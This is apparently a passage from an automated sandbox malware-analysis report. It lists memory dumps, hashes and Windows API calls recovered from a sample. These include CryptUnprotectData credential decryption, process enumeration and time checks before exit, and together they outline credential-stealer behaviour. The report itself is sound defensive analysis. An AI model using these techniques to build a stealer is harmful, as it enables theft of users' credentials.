                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ,c$,c$;_q~$A;O$VU.e$[Vm}
                            • API String ID: 0-633447320
                            • Opcode ID: 574347b01e4f32cca295581757e96a652fad670b1dfaf7dd7faa7ba9d7d53201
                            • Instruction ID: d58f1fffaecd0ee27e8977a92f6f9f6674d372c0ae421f12a6667af6c89347db
                            • Opcode Fuzzy Hash: 574347b01e4f32cca295581757e96a652fad670b1dfaf7dd7faa7ba9d7d53201
                            • Instruction Fuzzy Hash: B4B238F360C6049FE304AE6DEC8567AFBE9EF94320F16463DEAC5C3744EA3558018696
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00B22C42
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B22C49
                            • GetTimeZoneInformation.KERNEL32(?), ref: 00B22C58
                            • wsprintfA.USER32 ref: 00B22C83
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                            • String ID: wwww
                            • API String ID: 3317088062-671953474
                            • Opcode ID: df7521f55878024a0b793e85bda088499a9c2d36b7d634f3a9cc039633b093ba
                            • Instruction ID: 127af86c0a6d13aa46f37d57a93c0ec0dcb746677fd2194552fed7a3be7f12b2
                            • Opcode Fuzzy Hash: df7521f55878024a0b793e85bda088499a9c2d36b7d634f3a9cc039633b093ba
                            • Instruction Fuzzy Hash: 2E01F271A04714ABCB1C8B58DC4AB6ABB69EB84721F004369F916DB3D0D7B419008AE1
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: +y_?$jK0X$uHLA$Lc~$Lc~
                            • API String ID: 0-182589133
                            • Opcode ID: 018593f75ebf2c27273d197ca48dbbda0462d8047eaeec98bfd51be87c62f551
                            • Instruction ID: d12f73826aad1bcf8700906d9067f68474416b10f77d8b012d4c974cf22af202
                            • Opcode Fuzzy Hash: 018593f75ebf2c27273d197ca48dbbda0462d8047eaeec98bfd51be87c62f551
                            • Instruction Fuzzy Hash: 27B238F36086049FE3046E2DEC8567ABBE9EF94720F1A853DE6C4C7744E63598058793
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: /$w}$pr$x0?L$x0?L$}}
                            • API String ID: 0-475043414
                            • Opcode ID: 9827fc7ac12a818a36498bd6167143a8f0b8c71e1fab0451c50406dc77c70a5a
                            • Instruction ID: d4ca7cf34a542221cfa2616edf3454fc978af33446566b28f50f72d86fbe2e18
                            • Opcode Fuzzy Hash: 9827fc7ac12a818a36498bd6167143a8f0b8c71e1fab0451c50406dc77c70a5a
                            • Instruction Fuzzy Hash: 43B207F3A082009FE304AE2DEC8567AB7E5EF94720F1A4A3DEAC5C3744E67558058797
                            APIs
                            • GetSystemTime.KERNEL32(?), ref: 00B21B72
                              • Part of subcall function 00B21820: lstrcpy.KERNEL32(00000000,00B2CFEC), ref: 00B2184F
                              • Part of subcall function 00B21820: lstrlen.KERNEL32(01867080), ref: 00B21860
                              • Part of subcall function 00B21820: lstrcpy.KERNEL32(00000000,00000000), ref: 00B21887
                              • Part of subcall function 00B21820: lstrcat.KERNEL32(00000000,00000000), ref: 00B21892
                              • Part of subcall function 00B21820: lstrcpy.KERNEL32(00000000,00000000), ref: 00B218C1
                              • Part of subcall function 00B21820: lstrlen.KERNEL32(00B34FA0), ref: 00B218D3
                              • Part of subcall function 00B21820: lstrcpy.KERNEL32(00000000,00000000), ref: 00B218F4
                              • Part of subcall function 00B21820: lstrcat.KERNEL32(00000000,00B34FA0), ref: 00B21900
                              • Part of subcall function 00B21820: lstrcpy.KERNEL32(00000000,00000000), ref: 00B2192F
                            • sscanf.NTDLL ref: 00B21B9A
                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B21BB6
                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B21BC6
                            • ExitProcess.KERNEL32 ref: 00B21BE3
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                            • String ID:
                            • API String ID: 3040284667-0
                            • Opcode ID: dfff87dc134c3881f440d33bf99059f772dd3169f1ef2b6f25434985e4b80c1f
                            • Instruction ID: a30b5c9d62ae9f4560cf5581cec14e71fdfd42b08eef2c1a84193f280c16927f
                            • Opcode Fuzzy Hash: dfff87dc134c3881f440d33bf99059f772dd3169f1ef2b6f25434985e4b80c1f
                            • Instruction Fuzzy Hash: 4521E2B1518301AF8354DF69D88585BFBF8EED8214F409E1EF599C3220E770D5098BA2
                            APIs
                            • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00B0775E
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00B07765
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00B0778D
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00B077AD
                            • LocalFree.KERNEL32(?), ref: 00B077B7
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                            • String ID:
                            • API String ID: 2609814428-0
                            • Opcode ID: b58976332dc8aeb4a7039fcbbcaa035c6c76f4eb6d304ecf58f9472833bda389
                            • Instruction ID: 8fa8dc67405f470ca6b0dc404827df7db65e3f4bab705ce011f5f7134db7e39c
                            • Opcode Fuzzy Hash: b58976332dc8aeb4a7039fcbbcaa035c6c76f4eb6d304ecf58f9472833bda389
                            • Instruction Fuzzy Hash: F6011275B443187BEB14DB94DC5AFAABB78EB44B11F104155FB09EB3C0D6F0A9008BA0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ?Qo$A(sw$G+g^$oI}c$./
                            • API String ID: 0-3995498834
                            • Opcode ID: 2da51f2747bbca8fdaa411fa4092ea7a0ad2b025f8f82ecb900b08970a110f40
                            • Instruction ID: 94055d043ccd95d24154943d182758bd686ad608f746da2d21717dc68922133e
                            • Opcode Fuzzy Hash: 2da51f2747bbca8fdaa411fa4092ea7a0ad2b025f8f82ecb900b08970a110f40
                            • Instruction Fuzzy Hash: 1A720AF360C2009FE304AE6DEC8567AB7E9EFD4720F16893DE6C4D7744EA3598018696
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ;El$tY{$y3n${;n|
                            • API String ID: 0-4214471348
                            • Opcode ID: 53e2004475636aa6f3477f81b7f0f07ad5288f105563c99c2a239e0f776d3c21
                            • Instruction ID: 883a40a19e0cee30de478b6be87b74691784c835160b2ac232c746ee8061713a
                            • Opcode Fuzzy Hash: 53e2004475636aa6f3477f81b7f0f07ad5288f105563c99c2a239e0f776d3c21
                            • Instruction Fuzzy Hash: F6B225F360C2049FE3046E2DEC8567AFBE9EF94720F16863DEAC487744EA3558058697
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ."_m$B:cs$ww=${m}~
                            • API String ID: 0-3494201005
                            • Opcode ID: 0bf7849ec53ee004f807917d1afffcbd4077b11b0c5773a21fd8570e1a276069
                            • Instruction ID: 58d241e12398330d9e1e5f5a3c870d1af06a30d0a26863bea5420291676297e2
                            • Opcode Fuzzy Hash: 0bf7849ec53ee004f807917d1afffcbd4077b11b0c5773a21fd8570e1a276069
                            • Instruction Fuzzy Hash: 7FA2C6F3A08200AFE3046F2DEC85A7ABBE9EF94720F16493DE6C4C7344E67558458796
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383731322.000000000118B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_b00000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 4bdW$q~;=$w`L$;;~
                            • API String ID: 0-973534734
                            • Opcode ID: 761bc94bdfedb468eae1002298a03f0649e842b6969f6977c144a32344b9a1a8
                            • Instruction ID: a96da98b369fd61d592210d85ace8b82d43b18e341f13c7cbdc909ef67244fd1
                            • Opcode Fuzzy Hash: 761bc94bdfedb468eae1002298a03f0649e842b6969f6977c144a32344b9a1a8
                            • Instruction Fuzzy Hash: 08A2E6F360C6049FE304AE2DEC8577ABBE9EF94320F1A493DE6C4C7744E63598418696
                            APIs
                              • Part of subcall function 00B271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00B271FE
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B23A96
                            • Process32First.KERNEL32(00000000,00000128), ref: 00B23AA9
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00B23ABF
                              • Part of subcall function 00B27310: lstrlen.KERNEL32(------,00B05BEB), ref: 00B2731B
                              • Part of subcall function 00B27310: lstrcpy.KERNEL32(00000000), ref: 00B2733F
                              • Part of subcall function 00B27310: lstrcat.KERNEL32(?,------), ref: 00B27349
                              • Part of subcall function 00B27280: lstrcpy.KERNEL32(00000000), ref: 00B272AE
                            • CloseHandle.KERNEL32(00000000), ref: 00B23BF7
                            Memory Dump Source
                            • Source File: 00000001.00000002.1383181053.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                            • Associated: 00000001.00000002.1383156941.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B37000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000B96000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000BAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383181053.0000000000D38000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383353480.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000D4C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000ED2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FD7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383368698.0000000000FEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383599390.0000000000FEF000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1383712492.000000000118A000.00000040.00000001.01000000.00000003.sdmpDownload File
